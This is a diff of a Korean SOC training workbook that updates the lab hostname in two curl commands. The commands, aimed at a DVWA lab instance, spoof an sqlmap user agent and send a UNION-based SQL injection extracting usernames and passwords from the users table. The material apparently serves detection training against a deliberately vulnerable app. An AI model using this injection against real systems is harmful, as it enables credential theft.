--- a/contents/battle-workbook/soc-adv-w01.docx
+++ b/contents/battle-workbook/soc-adv-w01.docx
@@ -542,13 +542,13 @@
         </w:rPr>
         <w:t># 1) 스캐너 UA 로 정찰 흔적 남기기</w:t>
         <w:br/>
-        <w:t>curl -s -A "sqlmap/1.7" -H "Host: dvwa.6v6.lab" \</w:t>
+        <w:t>curl -s -A "sqlmap/1.7" -H "Host: dvwa.el34.lab" \</w:t>
         <w:br/>
         <w:t xml:space="preserve">  "http://192.168.0.161/vulnerabilities/sqli/?id=sa01r1-kim&amp;Submit=Submit"</w:t>
         <w:br/>
         <w:t># 2) UNION 기반 SQLi 한 발 (태그 포함)</w:t>
         <w:br/>
-        <w:t>curl -s -A "sqlmap/1.7" -H "Host: dvwa.6v6.lab" \</w:t>
+        <w:t>curl -s -A "sqlmap/1.7" -H "Host: dvwa.el34.lab" \</w:t>
         <w:br/>
         <w:t xml:space="preserve">  "http://192.168.0.161/vulnerabilities/sqli/?id=sa01r1-kim%27%20UNION%20SELECT%20user,password%20FROM%20users--+&amp;Submit=Submit"</w:t>
       </w:r>
